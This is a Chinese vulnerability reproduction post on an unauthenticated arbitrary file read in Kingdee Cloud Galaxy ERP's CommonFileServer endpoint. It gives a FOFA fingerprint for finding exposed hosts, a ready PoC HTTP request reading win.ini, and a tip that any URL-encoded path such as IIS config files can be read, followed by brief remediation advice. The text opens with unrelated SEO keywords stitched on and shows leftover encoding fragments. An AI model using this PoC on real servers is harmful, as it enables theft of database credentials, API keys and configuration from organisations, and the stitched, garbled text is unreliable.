做产地证网站,怎样自学开网店,长春精神文明建设网站,中国建设工程信息网招标公告0x01 产品简介 金蝶云星空是一款云端企业资源管理#xff08;ERP#xff09;软件#xff0c;为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。金蝶云星空聚焦多组织#xff0c;多利润中心的大中型企业#xff0c;以 “开放、标准、社交”三大特性为数字…0x01 产品简介 金蝶云星空是一款云端企业资源管理ERP软件为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。金蝶云·星空聚焦多组织多利润中心的大中型企业以 “开放、标准、社交”三大特性为数字经济时代的企业提供开放的 ERP 云平台。服务涵盖财务、供应链、智能制造、阿米巴管理、全渠道营销、电商、HR、企业互联网服务帮助企业实现数字化营销新生态及管理重构等提升企业数字化能力。
0x02 漏洞概述 由于金蝶云星空CommonFileServer接口处权限设置不当未经身份认证的攻击者可以利用此漏洞访问服务器上的任意文件包括数据库凭据、API密钥、配置文件等从而获取系统权限和敏感信息。
0x03 影响范围 6.x版本、7.x版本、8.x版本均受影响
0x04 复现环境
FOFAapp金蝶云星空-管理中心 0x05 漏洞复现
PoC
GET /CommonFileServer/c%3A%2Fwindows%2Fwin.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.79
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive PS漏洞比较简单粗暴直接在/CommonFileServer/路径后面拼接文件名就行特殊符号url编码 读取IIS配置文件 0x06 修复建议
关闭互联网暴露面设置目录权限
净化数据对用户传过来的文件名参数进行硬编码或统一编码对文件类型进行白名单控制对包含恶意字符或者空字符的参数进行拒绝。
